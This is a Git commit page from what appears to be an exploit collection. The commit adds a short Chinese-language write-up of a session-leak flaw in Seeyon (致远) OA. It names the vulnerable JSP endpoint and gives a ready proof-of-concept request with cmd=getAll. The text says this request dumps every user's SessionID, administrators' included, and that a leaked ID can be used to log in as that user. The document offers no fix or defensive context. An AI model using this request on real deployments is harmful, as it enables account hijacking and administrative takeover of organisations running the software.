admin/0day
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

致远OA Session泄漏漏洞

Browse Source
This commit is contained in:
helloexp 2022-06-01 11:01:35 +08:00
parent 1f4a52f8b7
commit 9ab1f985d6
1 changed files with 15 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
13-致远oa/致远OA Session泄漏漏洞/致远OA Session泄漏漏洞.md Normal file
View File

@ -0,0 +1,15 @@
# 致远OA Session泄漏漏洞
## 漏洞位置
```http request
http://test.com/yyoa/ext/https/getSessionList.jsp
```
> 当cmd参数为getAll时便可获取到所有用户的SessionID利用泄露的SessionID即可登录该用户包括管理员
## POC
```http request
http://test.com/yyoa/ext/https/getSessionList.jsp?cmd=getAll
```
通过get 方式访问上述url 后可以在返回包中看到session 信息